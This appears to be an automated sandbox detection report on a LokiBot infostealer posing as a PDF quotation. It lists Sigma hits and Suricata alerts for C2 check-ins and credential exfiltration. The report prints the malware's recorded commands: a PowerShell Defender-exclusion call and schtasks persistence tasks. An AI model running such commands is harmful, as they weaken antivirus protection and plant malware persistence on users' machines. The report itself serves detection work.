Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe, ParentProcessId: 7072, ParentProcessName: Quotation_Order_Request_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ProcessId: 3220, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bCirqu.exe, ParentImage: C:\Users\user\AppData\Roaming\bCirqu.exe, ParentProcessId: 7256, ParentProcessName: bCirqu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp", ProcessId: 7484, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe, ParentProcessId: 7072, ParentProcessName: Quotation_Order_Request_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", ProcessId: 1136, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe, ParentProcessId: 7072, ParentProcessName: Quotation_Order_Request_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ProcessId: 3220, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe, ParentProcessId: 7072, ParentProcessName: Quotation_Order_Request_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp", ProcessId: 1136, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:16.632012+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49740	104.21.112.1	80	TCP
2025-03-04T05:52:18.600292+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49741	104.21.112.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:15.867351+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	104.21.112.1	80	TCP
2025-03-04T05:52:17.864771+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.112.1	80	TCP
2025-03-04T05:52:18.716899+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.112.1	80	TCP
2025-03-04T05:52:20.596808+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.112.1	80	TCP
2025-03-04T05:52:22.913427+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.112.1	80	TCP
2025-03-04T05:52:24.810788+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.112.1	80	TCP
2025-03-04T05:52:26.701694+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.112.1	80	TCP
2025-03-04T05:52:28.608137+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.112.1	80	TCP
2025-03-04T05:52:30.530000+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.112.1	80	TCP
2025-03-04T05:52:32.479548+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.112.1	80	TCP
2025-03-04T05:52:34.361939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.112.1	80	TCP
2025-03-04T05:52:36.311959+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.112.1	80	TCP
2025-03-04T05:52:38.203627+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.112.1	80	TCP
2025-03-04T05:52:40.160169+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.112.1	80	TCP
2025-03-04T05:52:42.029778+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.112.1	80	TCP
2025-03-04T05:52:43.893264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.112.1	80	TCP
2025-03-04T05:52:45.672358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.112.1	80	TCP
2025-03-04T05:52:47.563225+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.112.1	80	TCP
2025-03-04T05:52:49.345420+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.112.1	80	TCP
2025-03-04T05:52:51.280717+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.112.1	80	TCP
2025-03-04T05:52:53.242413+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.112.1	80	TCP
2025-03-04T05:52:55.390373+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.112.1	80	TCP
2025-03-04T05:52:57.393552+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.112.1	80	TCP
2025-03-04T05:52:59.297752+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.112.1	80	TCP
2025-03-04T05:53:01.213934+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.112.1	80	TCP
2025-03-04T05:53:03.250460+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.112.1	80	TCP
2025-03-04T05:53:05.163192+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.112.1	80	TCP
2025-03-04T05:53:07.118673+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.112.1	80	TCP
2025-03-04T05:53:09.017703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49820	104.21.112.1	80	TCP
2025-03-04T05:53:10.938486+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49836	104.21.112.1	80	TCP
2025-03-04T05:53:12.890924+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49847	104.21.112.1	80	TCP
2025-03-04T05:53:14.844487+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.112.1	80	TCP
2025-03-04T05:53:16.746696+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.112.1	80	TCP
2025-03-04T05:53:18.641647+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.112.1	80	TCP
2025-03-04T05:53:20.573082+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49902	104.21.112.1	80	TCP
2025-03-04T05:53:22.494515+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.112.1	80	TCP
2025-03-04T05:53:24.311794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.112.1	80	TCP
2025-03-04T05:53:26.281475+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49941	104.21.112.1	80	TCP
2025-03-04T05:53:28.223341+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49950	104.21.112.1	80	TCP
2025-03-04T05:53:30.080789+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49961	104.21.112.1	80	TCP
2025-03-04T05:53:31.950332+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49974	104.21.112.1	80	TCP
2025-03-04T05:53:33.715423+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49985	104.21.112.1	80	TCP
2025-03-04T05:53:35.625690+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50001	104.21.112.1	80	TCP
2025-03-04T05:53:37.561185+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50012	104.21.112.1	80	TCP
2025-03-04T05:53:39.458912+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50023	104.21.112.1	80	TCP
2025-03-04T05:53:41.908562+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.112.1	80	TCP
2025-03-04T05:53:43.803522+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.112.1	80	TCP
2025-03-04T05:53:45.699594+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50068	104.21.112.1	80	TCP
2025-03-04T05:53:47.604073+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50079	104.21.112.1	80	TCP
2025-03-04T05:53:49.515496+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50082	104.21.112.1	80	TCP
2025-03-04T05:53:51.452116+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.112.1	80	TCP
2025-03-04T05:53:53.373080+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50084	104.21.112.1	80	TCP
2025-03-04T05:53:55.241423+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50085	104.21.112.1	80	TCP
2025-03-04T05:53:57.158338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50086	104.21.112.1	80	TCP
2025-03-04T05:53:59.108965+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50087	104.21.112.1	80	TCP
2025-03-04T05:54:01.042324+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50088	104.21.112.1	80	TCP
2025-03-04T05:54:02.986977+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.112.1	80	TCP
2025-03-04T05:54:04.795099+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50090	104.21.112.1	80	TCP
2025-03-04T05:54:06.753481+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50091	104.21.112.1	80	TCP
2025-03-04T05:54:08.705173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50092	104.21.112.1	80	TCP
2025-03-04T05:54:10.670220+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50093	104.21.112.1	80	TCP
2025-03-04T05:54:12.473876+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50094	104.21.112.1	80	TCP
2025-03-04T05:54:14.523512+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.112.1	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:21.490617+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49743	TCP
2025-03-04T05:52:27.455543+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49749	TCP
2025-03-04T05:52:29.371535+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49750	TCP
2025-03-04T05:52:31.308409+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49752	TCP
2025-03-04T05:52:35.146425+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49756	TCP
2025-03-04T05:52:38.997701+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49760	TCP
2025-03-04T05:52:44.524563+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49763	TCP
2025-03-04T05:52:48.193601+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49765	TCP
2025-03-04T05:52:52.063372+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49767	TCP
2025-03-04T05:52:54.231532+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49768	TCP
2025-03-04T05:52:58.138741+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49771	TCP
2025-03-04T05:53:00.068525+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49772	TCP
2025-03-04T05:53:02.033945+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49773	TCP
2025-03-04T05:53:04.007432+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49783	TCP
2025-03-04T05:53:05.954037+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49785	TCP
2025-03-04T05:53:09.791719+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49820	TCP
2025-03-04T05:53:11.730105+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49836	TCP
2025-03-04T05:53:13.676133+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49847	TCP
2025-03-04T05:53:15.595449+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49863	TCP
2025-03-04T05:53:19.397871+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49890	TCP
2025-03-04T05:53:23.123333+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49917	TCP
2025-03-04T05:53:25.046343+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49928	TCP
2025-03-04T05:53:27.061318+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49941	TCP
2025-03-04T05:53:28.932301+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49950	TCP
2025-03-04T05:53:32.566064+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49974	TCP
2025-03-04T05:53:34.473683+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	49985	TCP
2025-03-04T05:53:36.397729+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50001	TCP
2025-03-04T05:53:42.649121+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50039	TCP
2025-03-04T05:53:50.301810+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50082	TCP
2025-03-04T05:53:52.218069+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50083	TCP
2025-03-04T05:53:56.011042+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50085	TCP
2025-03-04T05:53:57.955613+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50086	TCP
2025-03-04T05:53:59.897763+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50087	TCP
2025-03-04T05:54:01.799846+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50088	TCP
2025-03-04T05:54:03.617357+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50089	TCP
2025-03-04T05:54:05.564489+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50090	TCP
2025-03-04T05:54:07.533836+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50091	TCP
2025-03-04T05:54:09.495566+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50092	TCP
2025-03-04T05:54:11.298285+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50093	TCP
2025-03-04T05:54:13.380758+0100	2025483	1	A Network Trojan was detected	104.21.112.1	80	192.168.2.4	50094	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:19.431377+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49742	104.21.112.1	80	TCP
2025-03-04T05:52:21.476938+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	104.21.112.1	80	TCP
2025-03-04T05:52:23.658055+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	104.21.112.1	80	TCP
2025-03-04T05:52:25.537080+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49746	104.21.112.1	80	TCP
2025-03-04T05:52:27.450414+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.112.1	80	TCP
2025-03-04T05:52:29.366533+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.112.1	80	TCP
2025-03-04T05:52:31.303217+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.112.1	80	TCP
2025-03-04T05:52:33.189318+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.112.1	80	TCP
2025-03-04T05:52:35.140458+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.112.1	80	TCP
2025-03-04T05:52:37.047088+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.112.1	80	TCP
2025-03-04T05:52:38.992575+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.112.1	80	TCP
2025-03-04T05:52:40.875603+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.112.1	80	TCP
2025-03-04T05:52:42.734315+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.112.1	80	TCP
2025-03-04T05:52:44.519375+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.112.1	80	TCP
2025-03-04T05:52:46.397209+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.112.1	80	TCP
2025-03-04T05:52:48.188184+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	104.21.112.1	80	TCP
2025-03-04T05:52:50.125375+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.112.1	80	TCP
2025-03-04T05:52:52.057817+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	104.21.112.1	80	TCP
2025-03-04T05:52:54.226389+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.112.1	80	TCP
2025-03-04T05:52:56.207148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	104.21.112.1	80	TCP
2025-03-04T05:52:58.131921+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	104.21.112.1	80	TCP
2025-03-04T05:53:00.063377+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	104.21.112.1	80	TCP
2025-03-04T05:53:02.025990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	104.21.112.1	80	TCP
2025-03-04T05:53:03.999877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49783	104.21.112.1	80	TCP
2025-03-04T05:53:05.939976+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49785	104.21.112.1	80	TCP
2025-03-04T05:53:07.844980+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.112.1	80	TCP
2025-03-04T05:53:09.786607+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49820	104.21.112.1	80	TCP
2025-03-04T05:53:11.725055+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49836	104.21.112.1	80	TCP
2025-03-04T05:53:13.670743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49847	104.21.112.1	80	TCP
2025-03-04T05:53:15.590346+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49863	104.21.112.1	80	TCP
2025-03-04T05:53:17.486441+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49874	104.21.112.1	80	TCP
2025-03-04T05:53:19.392634+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49890	104.21.112.1	80	TCP
2025-03-04T05:53:21.321885+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49902	104.21.112.1	80	TCP
2025-03-04T05:53:23.118222+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49917	104.21.112.1	80	TCP
2025-03-04T05:53:25.041199+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49928	104.21.112.1	80	TCP
2025-03-04T05:53:27.056263+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49941	104.21.112.1	80	TCP
2025-03-04T05:53:28.927179+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49950	104.21.112.1	80	TCP
2025-03-04T05:53:30.794982+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49961	104.21.112.1	80	TCP
2025-03-04T05:53:32.560975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49974	104.21.112.1	80	TCP
2025-03-04T05:53:34.468627+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49985	104.21.112.1	80	TCP
2025-03-04T05:53:36.392635+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50001	104.21.112.1	80	TCP
2025-03-04T05:53:38.297802+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50012	104.21.112.1	80	TCP
2025-03-04T05:53:40.392284+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50023	104.21.112.1	80	TCP
2025-03-04T05:53:42.644054+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50039	104.21.112.1	80	TCP
2025-03-04T05:53:44.509539+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50052	104.21.112.1	80	TCP
2025-03-04T05:53:46.408233+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50068	104.21.112.1	80	TCP
2025-03-04T05:53:48.331066+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50079	104.21.112.1	80	TCP
2025-03-04T05:53:50.296757+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50082	104.21.112.1	80	TCP
2025-03-04T05:53:52.207666+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50083	104.21.112.1	80	TCP
2025-03-04T05:53:54.077598+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50084	104.21.112.1	80	TCP
2025-03-04T05:53:56.005992+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50085	104.21.112.1	80	TCP
2025-03-04T05:53:57.950534+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50086	104.21.112.1	80	TCP
2025-03-04T05:53:59.892735+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50087	104.21.112.1	80	TCP
2025-03-04T05:54:01.794118+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50088	104.21.112.1	80	TCP
2025-03-04T05:54:03.612273+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50089	104.21.112.1	80	TCP
2025-03-04T05:54:05.552660+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50090	104.21.112.1	80	TCP
2025-03-04T05:54:07.528818+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50091	104.21.112.1	80	TCP
2025-03-04T05:54:09.490489+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50092	104.21.112.1	80	TCP
2025-03-04T05:54:11.293255+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50093	104.21.112.1	80	TCP
2025-03-04T05:54:13.375678+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50094	104.21.112.1	80	TCP
2025-03-04T05:54:15.502151+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50095	104.21.112.1	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T05:52:15.867351+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	104.21.112.1	80	TCP
2025-03-04T05:52:17.864771+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	104.21.112.1	80	TCP
2025-03-04T05:52:18.716899+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49742	104.21.112.1	80	TCP
2025-03-04T05:52:20.596808+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	104.21.112.1	80	TCP
2025-03-04T05:52:22.913427+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49744	104.21.112.1	80	TCP
2025-03-04T05:52:24.810788+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49746	104.21.112.1	80	TCP
2025-03-04T05:52:26.701694+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	104.21.112.1	80	TCP
2025-03-04T05:52:28.608137+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49750	104.21.112.1	80	TCP
2025-03-04T05:52:30.530000+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49752	104.21.112.1	80	TCP
2025-03-04T05:52:32.479548+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	104.21.112.1	80	TCP
2025-03-04T05:52:34.361939+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	104.21.112.1	80	TCP
2025-03-04T05:52:36.311959+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	104.21.112.1	80	TCP
2025-03-04T05:52:38.203627+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	104.21.112.1	80	TCP
2025-03-04T05:52:40.160169+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49761	104.21.112.1	80	TCP
2025-03-04T05:52:42.029778+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	104.21.112.1	80	TCP
2025-03-04T05:52:43.893264+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49763	104.21.112.1	80	TCP
2025-03-04T05:52:45.672358+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49764	104.21.112.1	80	TCP
2025-03-04T05:52:47.563225+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49765	104.21.112.1	80	TCP
2025-03-04T05:52:49.345420+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49766	104.21.112.1	80	TCP
